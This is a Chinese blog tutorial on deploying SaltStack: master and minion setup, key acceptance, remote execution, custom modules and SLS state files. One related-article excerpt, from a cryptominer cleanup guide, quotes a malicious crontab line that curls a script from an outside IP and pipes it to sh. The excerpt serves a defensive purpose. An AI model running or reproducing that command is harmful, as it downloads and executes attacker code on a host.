linux企业实战 --SaltStack(一) 安装部署 && 远程连接

最新推荐文章于 2023-01-11 17:31:04 发布
最新推荐文章于 2023-01-11 17:31:04 发布
阅读量444 收藏 2
点赞数
分类专栏: Linux企业实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45652989/article/details/106598798
版权

文章目录

一 SaltStack 简介

1. SaltStack 是什么??

  • SaltStack 是一个配置管理系统,能够维护预定义状态的远程节点。
  • SaltStack 是一个分布式远程执行系统,用来在远程节点上执行命令和查询数据。
  • SaltStack 是运维人员提高工作效率、规范业务配置与操作的利器。

2. Salt 的核心功能

  • 使命令发送到远程系统是并行的而不是串行的
  • 使用安全加密的协议
  • 使用最小最快的网络载荷
  • 提供简单的编程接口
  • Salt同样引入了更加细致化的领域控制系统来远程执行,使得系统成为目标不止可以通过主机名,还可以通过系统属性。

3. SaltStack 通信机制

  • SaltStack 采用 C/S模式,minion与master之间通过ZeroMQ消息队列通信,默认监听4505端口。

在这里插入图片描述

  • Salt Master运行的第二个网络服务就是ZeroMQ REP系统,默认监听4506端口

在这里插入图片描述

二 SaltStack 安装部署

1. 实验准备

三台主机。一台master,两台minion

主机iphostname作用
server1(172.25.42.1)ss1master(主节点)
server2(172.25.42.2)ss2minion(节点1)
server3(172.25.42.3)ss3minion(节点2)
  • 官网:https://www.saltstack.com/
  • 设置官方YUM仓库:
yum install https://repo.saltstack.com/yum/redhat/salt-repo-latest.el7.noarch.rpm

2. 安装部署

步骤一:在master 上安装salt-repo文件

master

[root@nn1 ~]# yum install https://repo.saltstack.com/yum/redhat/salt-repo-latest.el7.noarch.rpm 
[root@nn1 yum.repos.d]# yum list salt-master		#要求高于3000.2,bug修复了
salt-master.noarch                                                      3000.3-1.el7                                                       salt-latest
[root@nn1 yum.repos.d]# yum install -y salt-master

在这里插入图片描述

步骤二:官方镜像下载过慢,换为阿里云镜像

在这里插入图片描述

步骤三:此时发现salt-master版本过低,有漏洞,因此换为原本官方镜像

在这里插入图片描述
在这里插入图片描述

步骤四:配置服务端,客户端

在ss1上安装salt-master
在这里插入图片描述

在ss2和ss3中都安装 salt-minion
在这里插入图片描述

在这里插入图片描述

步骤五:设置开机自启动
在这里插入图片描述步骤六:查看端口,发现两个备用端口
在这里插入图片描述在 /etc/salt/master 配置文件中设置端口
在这里插入图片描述

步骤七:此时查看进程

发现自动开启了过多进程,但无任何信息

在这里插入图片描述

因此需要安装该软件,可以查看更多的进程信息
在这里插入图片描述
在这里插入图片描述

步骤九:在minion端加master的IP

vim /etc/salt/minion   #minion配置文件

在这里插入图片描述在这里插入图片描述

master的IP加入后,重启minion端
在这里插入图片描述

步骤十:连接

master端和minion端配置好后,查看master端的4505和4506端口,发现4506接收到了来自ss2的连接请求
在这里插入图片描述

接收到连接请求后,若允许了,则4505端口收到已经被允许的SS2

salt-key -L 列出连接请求
salt-key -A 允许所有的连接请求
salt-key -a ss2 允许指定主机连接请求

在这里插入图片描述连接后,查询/etc/salt/pki/ 目录下有连接到的SS2主机

在这里插入图片描述在master端可以查看minion端的连接目录已经彼此交换的公钥
在这里插入图片描述
此时在已连接的minion端下 /etc/salt/pki/目录下查询目录结构

在这里插入图片描述同时也可以查到交换的密钥
在这里插入图片描述

步骤十一:在ss3端加入masterIP,进行配置
在这里插入图片描述

允许连接
在这里插入图片描述在这里插入图片描述

三 远程连接

1. 远程执行Shell命令

salt 命令由三个主要部分构成

salt '<target>' <function> [arguments]

salt 内置执行模块列表:
http://docs.saltstack.cn/ref/modules/all/index.html
在这里插入图片描述

查看所连接的minion:ping

* 表全部被允许连接的minion端
* 也可只指定 minion

在这里插入图片描述

查看所连接的minion: df -h

-E 表示正则表达式

在这里插入图片描述
查看所连接的minion: ping hostname
在这里插入图片描述

pkg模块

在这里插入图片描述

在 master端 安装、卸载minion(ss2端)的 httpd
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ss2 minion端,master端的所有指令都存放该目录下

cat /var/cache/salt

在这里插入图片描述

2. 编写远程执行模块

在这里插入图片描述
在这里插入图片描述

创建远程配置文件的目录
在这里插入图片描述

在这里插入图片描述

在默认远程配置目录下,创建模块目录
在这里插入图片描述

编写模块文件,并同步模块
在这里插入图片描述执行后,master端的操作都缓存在该目录下
在这里插入图片描述

master端也可以直接调用
在这里插入图片描述

3. YAML语言

规则
缩进:Salt需要每个缩进级别由两个空格组成,不要使用Tabs
冒号:字典的keys在YAML中的表现形式是一个以冒号结尾的字符串
短横杠:想要表示列表项,使用一个短横杠加一个空格。

4. 配置管理

Salt 状态系统的核心:SLS

sls文件命名:
	1..sls 作为后缀,但调用时不需要加后缀
	2.使用子目录来做组织是一个很好的选择
	3.int.sls 在一个子目录里面表示引导文件,也就表示子目录本身 'apache/init.sls'=='apache'
	4.如果同时存在apache.sls 和 apache/init.sls,则apache/init.sls被忽略,apache.sls被用来表示apache

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

创建sls文件,并指定minion端执行

安装httpd文件
在这里插入图片描述在这里插入图片描述

安装多个软件包

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

批量执行,TOP文件

# vim /srv/salt/top.sls
base:
 '*':
  - apache

批量执行
# salt '*' state.highstate
一坨小红花
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux minio卸载命令,Minio的安装和基础使用
weixin_30715739的博客
05-12 6534
试用了下,感觉不错。阿里的oss也是基于这个东西做的。简介Minio是Apache License v2.0下发布的对象存储服务器。它与Amazon S3云存储服务兼容。它最适合存储非结构化数据,如照片,视频,日志文件,备份和容器/ VM映像。对象的大小可以从几KB到最大5TBMinio服务器足够轻,可以与应用程序堆栈捆绑在一起,类似于NodeJS,Redis和MySQL。方法一:二进制安装环境操...
linux-SaltStack自动化部署KubernetesHA
08-13
SaltStack在自动化部署Kubernetes HA集群时,通过编写Salt States,可以自动完成各个组件的安装、配置和初始化,大大简化了复杂的手动部署流程。它可以处理如证书生成、配置文件模板化、服务启动和健康检查等一系列...
saltstack ——分布式远程执行系统
qq_49286390的博客
01-23 238
server11安装salt-master server12、server13安装salt-minion 在minion端编辑/etc/salt/minion master: 172.25.11.11 并永久开启salt-minion此服务 在master端 salt-key -L 列出所有key值 salt-key -A 允许所有key值 在salt-key -L会显示server12、server13 安装lsof yum install lsof -y lsof -i :4505 salt ‘’
2.SaltStack部署应用
最新发布
Rain的博客
01-11 152
SaltStack搭建完成后,测试部署应用
cenyos7安装 yum不可用_Saltstack 介绍、安装、配置(一)
weixin_35472986的博客
02-06 365
Slatstack 介绍yum install https://repo.saltstack.com/yum/redhat/salt-repo-latest-2.el7.noarch.rpm #cenyos7官方yum源saltstack功能介绍三大功能:1.远程执行2.配置管理(配置某个服务状态)3.云管理 (对接openstack)saltstack的优点(1)、部署简单,方便(2)、支持...
saltstack20200429漏洞升级
linux_s2018的博客
05-03 887
https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf https://labs.f-secure.com/advisories/saltstack-authorization-bypass?spm=a2c4g.11174386.n2.3.334b1051JIYgq3 saltsatck漏洞导致被...
Linux安装VNC-远程安装.doc
11-28
Linux 系统中,远程桌面连接是一种非常有用的功能,它可以让用户远程连接Linux 服务器,实现远程控制和协作。VNC(Virtual Network Computing)是一种流行的远程桌面连接协议,本文将详细介绍如何在 Linux ...
linux-SaltStack自动化部署Kubernetes
08-13
**Linux开发-其它:SaltStack自动化部署Kubernetes v1.9.3** 在现代云原生环境中,Kubernetes(简称K8s)作为容器编排的首选平台,因其强大的服务发现、自动伸缩和资源管理能力而备受青睐。在部署如此复杂的系统时...
linux-SaltStack通过kubeadm自动化部署Kubernetes
08-13
标题中的“Linux SaltStack通过kubeadm自动化部署Kubernetes”揭示了本次讨论的核心:如何利用开源自动化配置管理工具SaltStack来简化Kubernetes集群的部署,特别是借助kubeadm这个官方提供的轻量级工具。...
Linux运维-运维构架师-09.SaltStack远程执行-返回.mp4
06-06
Linux运维-运维构架师-09.SaltStack远程执行-返回.mp4
saltstack一键部署安装包,脚本)
09-27
saltstack一键部署安装包,脚本),含所有的依赖包,自动化运维,通过建立master和minion之间的认证,可实现基于C/S架构的远程部署
weblogic 11g静默安装以及saltstack自动化安装
03-01
本文档详细说明了weblogic 11g的静默安装过程,以及问题解答,并结合saltstack进行自动化批量部署weblogic。
saltstack安装rpm
01-31
这是一个saltstack的rpm安装包的压缩文件,主要是为了方便大家安装和学习saltstack自动化运维工具。
saltstack windows 64位客户端
12-18
很多人找不到windows客户端,附件是从官网下载的
手工清除Saltstack漏洞导致的挖矿病毒
wisheen的专栏
05-09 1303
1. ssh到自己的主机,top指令查看,如果有salt-minions之类的进程占满cpu,说明中招了,先卸载一下salt-minion centos/redhat: yum remove salt-minion ubuntu: apt remove salt-minion 2. 查看定时任务 crontab -l 如果看到类似这样 * * * * * curlhttp://217.8.117.137/c.sh| sh > /dev/null 2>&1 * * * * *...
salt的master和minion版本不一致问题
橙汁Iter的博客
01-19 1034
在工作中,遇到一种情况,就是线上机器大部分是centos6.8的系统,python版本为2.6,导致能使用的salt的版本为2016.11-2 现在计划将线上机器向centos7迭代,python版本为2.7,且saltstack官方已不在维护低版本的的镜像,故只能对版本进行升级。 于是选择了salt-3000.6.1.el7版本 但是,这种salt-master版本低,salt-minion版本高的情况会导致grain获取不到一些参数,会有如下报错 经过测试,确实是没有这个键值,如下图
LinuxSaltStack安装与配置
qq_42303254的博客
03-30 755
SaltStack的官方文档:https://www.saltstack.com/ Saltstack的中文文档:http://docs.saltstack.cn/ SaltStack安装包的下载地址:http://repo.saltstack.com/ 一、基础介绍 1、简介 SaltStack是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,...
Linux-Saltstack安装及配置(基础篇)
热门推荐
hank的博客
05-30 1万+
               一、环境准备 1、redhat6.7 2台(master:172.10.25.15; minion : 172.10.25.12 ) 2、python版本 2.7.14 3、anaconda5.1  下载路径:https://www.anaconda.com/download/#linux     二、SaltStack下载安装 因大部分公司对内部网络...
Linuxsaltstack 安装及简单使用
zclinux的博客
08-17 4313
准备三台server,一台为master(10.96.20.113),另两台为minion(10.96.20.117,10.96.20.118) 主机名(master、minion1、minion2)、IP配置好(10.96.20.113、10.96.20.117、10.96.20.118)   master-side和minion-side: [root@master ~]# uname...
was-agent部署.doc
02-23
- 首先,确保已经安装Linux操作系统上的was-agent,如果没有,参照Linuxosagent部署手册进行安装。这通常包括检查系统的libstdc++.so.5库,因为项目可能缺少32位版本。通过`rpm -ivh`命令安装兼容的32位版本,如`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值